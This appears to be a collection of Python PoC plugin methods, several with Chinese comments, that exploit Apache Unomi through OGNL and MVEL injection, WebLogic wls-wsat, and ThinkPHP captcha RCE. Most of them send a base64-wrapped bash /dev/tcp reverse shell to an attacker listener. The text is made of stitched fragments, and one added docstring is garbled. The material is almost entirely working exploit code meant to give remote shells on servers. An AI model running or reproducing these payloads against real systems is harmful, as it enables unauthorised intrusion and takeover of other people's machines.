def _shell(self): result = {} #执行反弹shell的请求 pocurl = self.url + '/context.json' pocheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64', 'Content-Type': 'application/json;charset=UTF-8', 'Content-Length': '1003', 'Accept': 'application/json, text/plain, */*', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9' } IP = get_listener_ip() PORT = get_listener_port() # IP = yourlistenerip # PORT = yourlistenerport payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1' payload = 'bash -c {echo,' + (base64.b64encode( payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}' pocjson = '{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName":"(#runtimeclass = #this.getClass().forName(\\"java.lang.Runtime\\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\\"getRuntime\\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\\"exec\\")}.{? #this.getParameters()[0].getType().getName().equals(\\"java.lang.String\\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\\"' + payload + '\\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"6666"} ' try: r2 = requests.post(url=pocurl, headers=pocheaders, data=pocjson, verify=False) #执行ping指令 except Exception as e: logger.warn(str(e)) return self.parse_attack(result)
def _shell(self): result = {} #执行反弹shell的请求 pocurl = self.url + '/context.json' pocheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64', 'Content-Type': 'application/json;charset=UTF-8', 'Content-Length': '1003', 'Accept': 'application/json, text/plain, */*', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9' } IP = get_listener_ip() PORT = get_listener_port() # IP = yourlistenerip # PORT = yourlistenerport payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1' payload = 'bash -c {echo,' + (base64.b64encode( payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}' pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\" ' + payload + '\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}' try: r2 = requests.post(url=pocurl, headers=pocheaders, data=pocjson, verify=False) #执行ping指令 except Exception as e: logger.warn(str(e)) return self.parse_attack(result)
def _shell(self) -> None:
    """Shell-mode entry point (stub).

    In shell mode only a single PoC script can be run; the console enters an
    interactive shell mode to execute commands and display their output
    (translated from the original docstring).

    As written this is a placeholder: ``cmd`` is built from
    ``REVERSE_PAYLOAD.BASH`` and the listener address but is never sent
    anywhere, and the method returns ``None``.
    """
    cmd = REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port())
    # Attack code goes here: execute cmd (translated from the original comment).
    # NOTE(review): cmd is unused below; this method currently does nothing.
    pass
def _options(self) -> OrderedDict:
    """Return the PoC's configurable options as an ``OrderedDict``.

    Exposes a single option ``"command"`` backed by an ``OptDict`` whose choices
    are ``"nc"`` (``REVERSE_PAYLOAD.NC``, stored as-is) and ``"bash"``
    (``REVERSE_PAYLOAD.BASH`` already formatted with the listener ip/port).
    ``"bash"`` is the pre-selected choice. ``OptDict`` and ``REVERSE_PAYLOAD``
    are defined elsewhere in the file.
    """
    o = OrderedDict()
    payload = {
        # NOTE(review): NC is left unformatted while BASH is filled in here —
        # presumably the consumer formats it later; confirm against the caller.
        "nc": REVERSE_PAYLOAD.NC,
        "bash": REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port()),
    }
    o["command"] = OptDict(selected="bash", default=payload)
    return o
def _shell(self) -> None:
    """Run the reverse-shell command through the file's ``start`` helper.

    Builds ``command`` from ``REVERSE_PAYLOAD.BASH`` and the listener address,
    then calls ``start(self.url, command, username, password, shell=True)``;
    ``start`` is defined elsewhere in the file and its semantics are not visible
    here. Any exception from ``start`` is logged at error level and swallowed.
    """
    # The '******' values look like redaction placeholders in this listing rather
    # than working credentials — presumably they must be supplied; verify.
    username = '******'
    password = '******'
    command = REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port())
    try:
        start(self.url, command, username, password, shell=True)
    except Exception as ex:
        # Failure is logged only; the method returns None either way.
        logger.error(str(ex))
def _shell(self) -> None:
    """POST a generated XML payload to ``<self.url>/wls-wsat/CoordinatorPortType``.

    The command is a bash ``/dev/tcp`` reverse shell pointed at the listener
    address; it is wrapped via ``self.get_shell_payload('/bin/bash', '-c', cmd)``
    (defined elsewhere in the file) and sent with ``Content-Type: text/xml``.
    The response is discarded and any request exception is logged and swallowed.
    Note ``requests.post`` is called with no timeout here, unlike nothing else in
    this file sets one either.
    """
    vul_url = urljoin(self.url, '/wls-wsat/CoordinatorPortType')
    cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1'.format(get_listener_ip(), get_listener_port())
    # get_shell_payload's output format is not visible here; it is sent as the raw body.
    shell_payload = self.get_shell_payload('/bin/bash', '-c', cmd)
    headers = {
        "Content-Type": "text/xml;charset=UTF-8",
        # Fixed, dated UA string — an easy signature for request logging/WAF rules.
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
    }
    try:
        requests.post(vul_url, data=shell_payload, headers=headers)
    except Exception as e:
        # Logged only; no result is returned.
        logger.warn(str(e))
def _shell(self): vulurl = self.url + "/index.php?s=captcha" # 生成写入文件的shellcode _list = generate_shellcode_list(listener_ip=get_listener_ip(), listener_port=get_listener_port(), os_target=OS.LINUX, os_target_arch=OS_ARCH.X86) for i in _list: data = { '_method': '__construct', 'filter[]': 'system', 'method': 'get', 'server[REQUEST_METHOD]': i } headers = {"Content-Type": "application/x-www-form-urlencoded"} requests.post(vulurl, data=data, headers=headers)